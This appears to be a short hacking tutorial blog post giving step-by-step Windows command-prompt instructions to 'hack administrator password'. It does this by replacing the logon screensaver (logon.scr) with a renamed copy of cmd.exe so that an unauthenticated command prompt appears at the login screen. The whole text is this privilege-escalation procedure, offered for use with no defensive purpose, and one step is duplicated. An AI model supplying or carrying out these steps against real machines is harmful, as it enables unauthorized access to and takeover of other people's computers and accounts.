I have already shown how to hack admin password in the basic way.If that doesn't work , you can try this new and advance method to hack administrator password.
>>Go to Start>Run , type cmd to open command prompt
>>Go to Start>Run , type cmd to open command prompt
>>Enter this command cd\ to make directory to C:(default drive)
>>Now enter this command cd windows\system32 , to change the directory in command prompt to C:\windows\system32
>>Now type mkdir temphack to make a temporary directory for backup![]() |
Admin Hack |
>>Then , type copy logon.scr temphack\logon.scr to copy logon.scr to temphack folder
>>Now type copy cmd.exe temphack\cmd.exe copy cmd.exe to temphack folder
>>Then type del logon.scr to delete logon.scr . The backup of this file is in the folder temphack
>>Now type rename cmd.exe logon.scr to rename command prompt to logon screensaver
>>Now you get unprotected command prompt without logging in when windows loads logon screensaver at startup!!!
there U R DONE!!!